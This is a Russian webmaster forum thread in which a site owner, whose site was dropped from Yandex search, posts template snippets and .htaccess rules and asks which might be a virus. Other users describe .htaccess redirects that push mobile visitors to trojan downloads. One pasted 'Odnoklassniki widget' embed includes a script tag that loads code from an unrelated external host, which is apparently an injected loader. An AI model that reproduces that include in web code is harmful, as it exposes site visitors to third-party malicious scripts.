Исключение из Яндекс-поиска. Могут ли на сайт занести вирус?

#31 13 октября 2013 в 15:45

<script src="/admin/js/modconfig.js" type="text/javascript"></script>


<script src="/includes/jquery/jquery.js" type="text/javascript"></script>
<script src="/admin/js/jquery.jclock.js" type="text/javascript"></script>
<script src="/includes/jquery/tabs/jquery.ui.min.js" type="text/javascript"></script>
<?

это я удалила...
это "оно"?
ссылок ведь ни каких нет…
#32 13 октября 2013 в 15:57
все бывает, Кошка. у меня, например, бывает так, что в файле .htaccess самопроизвольно появляется переадресация для тех, кто заходит с мобильных устройств на сайт, на страницу с предложением закачать свеженький троян) и тогда, заходя с мобильника на сайт, сразу это видно, значит надо идти и чистить файл .htaccess от лишнего кода.
никому паролей я при этом не сообщала, причем два сайта на разных серверах, но проблема возникала и там, и там, и для сайта на инстант, и для сайта на самописанном движке, хостинг один и тот же. честно сазать, не помню, что рекомендовали хостеры, просто слежу за этим делом и все, если что, подчищаю.
#33 13 октября 2013 в 16:15

в файле .htaccess

Любаня
а в этом файле у меня вот что находится:


Options -Indexes
<Files ~ "\.tpl$">
Order allow,deny
Deny from all
</Files>

это нормальная запись или тоже ее в топку?
#34 13 октября 2013 в 16:20

это нормальная запись или тоже ее в топку?

Кошка
за содержимое этого файла не скажу, у всех что-то свое в этом файле.
я лишь привела пример, когда файлы на сервере менялись каким-то образом, не зависимо от желания владельца. может уязвимость какая-то где-то, может проделки хостера, я не знаю точно, что это, но вот какие-то видимо роботы заходить могут и что-то дописывать, при определенных условиях.
#35 13 октября 2013 в 16:26
а это подозрительная запись?

<script type="text/javascript">

$.noConflict();

jQuery(document).ready(function($) {

$("#featured > ul").tabs({fx:{opacity: "toggle"}}).tabs("rotate", 9000, false);

$('.jclock').jclock();

$("#users_tabs > ul.r_block_tabs").tabs();

$("#posts_tabs > ul.r_block_tabs").tabs();


$('#topmenu .menu li').hover(

function() {

$(this).find('ul:first').show();

$(this).find('a:first').addClass("hover");

},

function() {

$(this).find('ul:first').hide();

$(this).find('a:first').removeClass("hover");

}

);

});

</script>

#36 13 октября 2013 в 16:28

за содержимое этого файла не скажу, у всех что-то свое в этом файле.
я лишь привела пример, когда файлы на сервере менялись каким-то образом, не зависимо от желания владельца. может уязвимость какая-то где-то, может проделки хостера, я не знаю точно, что это, но вот какие-то видимо роботы заходить могут и что-то дописывать, при определенных условиях.

Любаня
ну вот v
а то сразу: "верх тупизма бла-бла-бла"

может "дырка" в сайте есть какая?
#37 13 октября 2013 в 16:51
Может и не в сайте "дырка"… я вспомнила, рекомендовали установить разрешение — заходить по ftp только с одного IP. Но не у весх такая возможность имеется.
#38 13 октября 2013 в 17:37
Кошка, а как насчет рекламного блока от визарда то?)
#39 13 октября 2013 в 17:43

Кошка, а как насчет рекламного блока от визарда то?)

letsgo
а разве он не убрался?
Это окошечко я вижу один раз в сутки — при первом посещении...
так что завтра только смогу проверить...

а вы его видете?
#40 13 октября 2013 в 17:47

а вы его видете?

Кошка

То что приводили, совсем не то. Вы просто вспомните — ставили ли вы рекламу Визарда. Он в модулях видимо стоит.
#41 13 октября 2013 в 17:53
Думаю для начала нужно убрать это:


А вообще посмотрел, может и все гораздо проще, что то просто вставлено с партнеркой, и она работает так как и должна работать.

Проверьте всю рекламу что стоит, и прочитайте условия её использования (и что именно она делает).
#42 13 октября 2013 в 18:26

Вы просто вспомните — ставили ли вы рекламу Визарда. Он в модулях видимо стоит.

letsgo
нет. ничего подобного я не ставила.
всю рекламу я отрисовываю сама.
картинки размещаю на своем сайте.
ссылки с картинок — тоже в основном на мой же сайт.
Единственное что есть "чужого" это ссылка на газпром и на фильм — но там тупо ссылка на сайт и картинка — такой вот код:

<p style="text-align: center; "><a href="http://astral-film.ru/"><img width="520" height="134" align="" alt="" src="http://s0.2mdn.net/ads/richmedia/studio/24333843/25135644_20130930065135295_970x250_youtube_astral_failover.jpg" /></a></p> <p> </p>

#43 13 октября 2013 в 18:28
также недавно вставила код с сайта одноклассники (переход в нашу группу)

<script language="JavaScript" src="http://xuxu.org.ua/i/200/156/10088012"></script> <div id="ok_group_widget"> </div> <div id="ok_group_widget"> </div> <script> !function (d, id, did, st) { var js = d.createElement("script"); js.src = "connect.ok.ru/connect.js"; js.onload = js.onreadystatechange = function () { if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") { if (!this.executed) { this.executed = true; setTimeout(function () { OK.CONNECT.insertGroupWidget(id,did,st); }, 0); } }} d.documentElement.appendChild(js); }(document,"ok_group_widget","51733258240144","{width:200,height:285}"); </script>


но с одноклашек я не могла же что-то подцепить?
#44 13 октября 2013 в 18:32
Да могли конечно. Надо чистить сайт. и дырку искать.
#45 13 октября 2013 в 18:42
в файле template.php удаляю скрипт где есть js
а когда просматриваю на сайте код страницы — он почему-то все равно присутствует
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.